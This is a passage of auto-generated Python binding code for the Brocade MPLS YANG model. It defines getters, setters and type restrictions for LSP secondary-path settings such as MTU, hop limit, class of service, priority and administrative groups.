self.__secpath_ipmtu = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_lsp_adaptive(self):
"""
Getter method for lsp_adaptive, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_adaptive (empty)
"""
return self.__lsp_adaptive
def _set_lsp_adaptive(self, v, load=False):
"""
Setter method for lsp_adaptive, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_adaptive (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_adaptive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_adaptive() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_adaptive must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__lsp_adaptive = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_adaptive(self):
self.__lsp_adaptive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_lsp_reoptimize_timer(self):
"""
Getter method for lsp_reoptimize_timer, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_reoptimize_timer (uint32)
"""
return self.__lsp_reoptimize_timer
def _set_lsp_reoptimize_timer(self, v, load=False):
"""
Setter method for lsp_reoptimize_timer, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_reoptimize_timer (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_reoptimize_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_reoptimize_timer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_reoptimize_timer must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__lsp_reoptimize_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_reoptimize_timer(self):
self.__lsp_reoptimize_timer = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_lsp_commit(self):
"""
Getter method for lsp_commit, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_commit (empty)
"""
return self.__lsp_commit
def _set_lsp_commit(self, v, load=False):
"""
Setter method for lsp_commit, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_commit (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_commit is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_commit() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_commit must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__lsp_commit = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_commit(self):
self.__lsp_commit = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
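  # Usage sketch (illustrative): YANG `empty` leaves such as lsp-commit are modeled
  # as YANGBool, so presence is expressed by assigning True. Assuming an instance `sp`:
  #
  #   sp.lsp_commit = True   # marks the leaf present; bad types raise ValueError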
def _get_lsp_record(self):
"""
Getter method for lsp_record, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_record (enable-disable)
"""
return self.__lsp_record
def _set_lsp_record(self, v, load=False):
"""
Setter method for lsp_record, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_record (enable-disable)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_record is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_record() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_record must be of a type compatible with enable-disable""",
'defined-type': "brocade-mpls:enable-disable",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)""",
})
self.__lsp_record = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_record(self):
self.__lsp_record = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
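  # Usage sketch (illustrative): enumerated leaves built on dict_key restrictions,
  # such as lsp-record, accept only the listed keys. Assuming an instance `sp`:
  #
  #   sp.lsp_record = u'enable'   # valid key (maps to value 1)
  #   sp.lsp_record = u'on'       # raises ValueError: not in {enable, disable}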
def _get_lsp_cos(self):
"""
Getter method for lsp_cos, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_cos (uint32)
"""
return self.__lsp_cos
def _set_lsp_cos(self, v, load=False):
"""
Setter method for lsp_cos, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_cos (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_cos is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_cos() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_cos must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__lsp_cos = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_cos(self):
self.__lsp_cos = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_lsp_hop_limit(self):
"""
Getter method for lsp_hop_limit, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_hop_limit (uint16)
"""
return self.__lsp_hop_limit
def _set_lsp_hop_limit(self, v, load=False):
"""
Setter method for lsp_hop_limit, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_hop_limit (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_hop_limit is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_hop_limit() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_hop_limit must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)""",
})
self.__lsp_hop_limit = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_hop_limit(self):
self.__lsp_hop_limit = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
def _get_lsp_cspf_computation_mode(self):
"""
Getter method for lsp_cspf_computation_mode, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_cspf_computation_mode (cspf-computation-mode)
"""
return self.__lsp_cspf_computation_mode
def _set_lsp_cspf_computation_mode(self, v, load=False):
"""
Setter method for lsp_cspf_computation_mode, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_cspf_computation_mode (cspf-computation-mode)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_cspf_computation_mode is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_cspf_computation_mode() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_cspf_computation_mode must be of a type compatible with cspf-computation-mode""",
'defined-type': "brocade-mpls:cspf-computation-mode",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)""",
})
self.__lsp_cspf_computation_mode = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_cspf_computation_mode(self):
self.__lsp_cspf_computation_mode = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)
def _get_lsp_traffic_engineering(self):
"""
Getter method for lsp_traffic_engineering, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_traffic_engineering (container)
"""
return self.__lsp_traffic_engineering
def _set_lsp_traffic_engineering(self, v, load=False):
"""
Setter method for lsp_traffic_engineering, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_traffic_engineering (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_traffic_engineering is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_traffic_engineering() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_traffic_engineering must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)""",
})
self.__lsp_traffic_engineering = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_traffic_engineering(self):
self.__lsp_traffic_engineering = YANGDynClass(base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
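  # Usage sketch (illustrative): container children like lsp-traffic-engineering
  # are pre-instantiated YANGDynClass containers, so they are normally navigated
  # through the property rather than reassigned. Assuming an instance `sp`:
  #
  #   te = sp.lsp_traffic_engineering   # returns the nested container object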
def _get_priority(self):
"""
Getter method for priority, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/priority (container)
"""
return self.__priority
def _set_priority(self, v, load=False):
"""
Setter method for priority, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/priority (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_priority is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_priority() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """priority must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)""",
})
self.__priority = t
if hasattr(self, '_set'):
self._set()
def _unset_priority(self):
self.__priority = YANGDynClass(base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
def _get_lsp_exclude_any(self):
"""
Getter method for lsp_exclude_any, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_exclude_any (string)
"""
return self.__lsp_exclude_any
def _set_lsp_exclude_any(self, v, load=False):
"""
Setter method for lsp_exclude_any, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_exclude_any (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_exclude_any is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_exclude_any() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_exclude_any must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_exclude_any = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_exclude_any(self):
self.__lsp_exclude_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
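  # Usage sketch (illustrative): leaf-lists such as lsp-exclude-any are backed by
  # TypedListType, so ordinary list operations apply and each entry is checked
  # against the 1..256 character length restriction. Assuming an instance `sp`:
  #
  #   sp.lsp_exclude_any.append(u'gold')   # entries behave like a typed list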
def _get_lsp_include_any(self):
"""
Getter method for lsp_include_any, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_include_any (string)
"""
return self.__lsp_include_any
def _set_lsp_include_any(self, v, load=False):
"""
Setter method for lsp_include_any, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_include_any (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_include_any is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_include_any() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_include_any must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_include_any = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_include_any(self):
self.__lsp_include_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_lsp_include_all(self):
"""
Getter method for lsp_include_all, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_include_all (string)
"""
return self.__lsp_include_all
def _set_lsp_include_all(self, v, load=False):
"""
Setter method for lsp_include_all, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_include_all (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_include_all is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_include_all() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_include_all must be of a type compatible with string""",
'defined-type': "string",
